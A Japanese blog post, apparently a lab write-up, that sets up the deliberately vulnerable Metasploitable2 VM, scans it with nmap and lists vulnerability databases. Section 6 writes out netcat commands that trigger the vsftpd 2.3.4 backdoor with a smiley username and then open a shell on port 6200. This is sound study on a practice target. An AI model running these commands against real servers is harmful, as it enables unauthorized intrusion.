Metasploitable(Linux)をセットアップして攻撃してみた

参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」を参考に、
自環境にMetasploitableをセットアップして攻撃してみました。

1.環境
Kali Linux:192.168.0.15
Metasploitable(32bit):192.168.0.23

2.Metasploitable2のセットアップ

Metasploitable2
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

ダウンロードしたイメージはVMwarePlayer用のイメージです。
ESXiで使用するには、vCenter Converterでイメージ変換の必要があります。

Download VMware vCenter Converter Standalone
https://my.vmware.com/en/web/vmware/downloads/info/slug/infrastructure_operations_management/vmware_vcenter_converter_standalone/6_2_0

さっそくvCenter Conveterをインストールして、イメージ変換操作を行います。
変換は約1分で完了です。

「ハッキング・ラボのつくりかた」に従い、

日本語キーボードレイアウトへの変更
sudo loadkeys jp

IP変更
sudo vi /etc/network/interfaces

を行います。

ubuntuのバージョン確認
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

タイムゾーンの変更
sudo dpkg-reconfigure tzdata
Asia->Tokyo

も行います。

3.nmapで攻撃対象のopenポート、バージョンを確認

nmap -sV -O -p- 192.168.0.23
-sV:バージョンスキャン。各ポートのサービスのバージョンを検出する。
-O:フィンガープリント。ターゲットのOSを特定する。
-p-:1番~65535番のポート番号を対象とする。

4.脆弱性情報の確認

CVE
https://cve.mitre.org/index.html

CVEdetails
https://www.cvedetails.com/

Exploit Database
https://www.exploit-db.com/

vsftpd 2.3.4で検索するとバックドアについての情報が出てくる。

5.脆弱性情報の読み方

エンジニアなら脆弱性情報を読めるようになろう
https://cyberagent.ai/blog/tech/4025/

脆弱性対策情報データベース(詳細ページ)の読み方
https://jvndb.jvn.jp/nav/jvndbhelp.html

脆弱性レポートの読み方
https://jvn.jp/nav/jvnhelp.html

CVSSv2読み方
https://www.ipa.go.jp/security/vuln/CVSS.html

CVSSv3読み方
https://www.ipa.go.jp/security/vuln/CVSSv3.html

6.vsftpd2.3.4に攻撃

Kali側の操作

nc 192.168.0.23 21
USER attacker:)
PASS hoge

↑のみでmetasploitable側のPort6200がOpenになります。

nc -nv 192.168.0.23 6200
プロンプトは返ってこないが、下記のようにコマンドを入力すると、
結果が返ってきます。
whoami
uname -a

7.まとめ
vsftpdへの攻撃は簡単に出来てしまったので驚きました。
また、脆弱性に対する攻撃ツールのDBが公開されているのも驚きました。
バージョンアップの大切さがわかりました。

Comments are closed.